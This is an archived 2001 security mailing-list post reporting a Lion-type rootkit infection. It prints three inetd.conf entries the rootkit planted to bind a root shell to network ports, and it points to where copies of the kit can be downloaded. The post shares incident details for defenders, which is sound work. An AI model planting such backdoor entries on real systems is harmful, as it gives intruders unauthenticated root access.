Security Incidents: Re: Lion Worm/crew.tgz

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Security Incidents mailing list archives

Re: Lion Worm/crew.tgz

From: John Jasen <jjasen1 () UMBC EDU>
Date: Mon, 26 Mar 2001 12:18:48 -0500

A friend of mine just got slapped silly with a lion-type rootkit.

the entries added in /etc/inetd.conf are as follows:

smux stream tcp nowait root /bin/sh /bin/sh -i
1008 stream tcp nowait root /bin/sh sh
asp stream tcp nowait root /sbin/asp

I have copies of the ramen.tgz kit and what was placed in /dev/.lib
available at http://www.qis.net/~jjasen

--
-- John E. Jasen (jjasen1 () umbc edu)
-- In theory, theory and practise are the same. In practise, they aren't.

By Date By Thread

Current thread:

Re: Lion Worm/crew.tgz, (continued)
- Re: Lion Worm/crew.tgz Michael H. Warfield (Mar 24)
  - Re: Lion Worm/crew.tgz Andreas Östling (Mar 24)
    - Re: Lion Worm/crew.tgz Michael H. Warfield (Mar 24)
    - Re: Lion Worm/crew.tgz Dave Dittrich (Mar 26)
- Re: Lion Worm/crew.tgz John Jasen (Mar 26)
  - Re: Lion Worm/crew.tgz Cooper (Mar 26)
    - Re: Lion Worm/crew.tgz John Jasen (Mar 26)
    - Re: Lion Worm/crew.tgz Daniel Martin (Mar 26)
    - Re: Lion Worm/crew.tgz Cooper (Mar 26)
    - Message not available
    - Re: Lion Worm/crew.tgz Chris Keladis (Mar 26)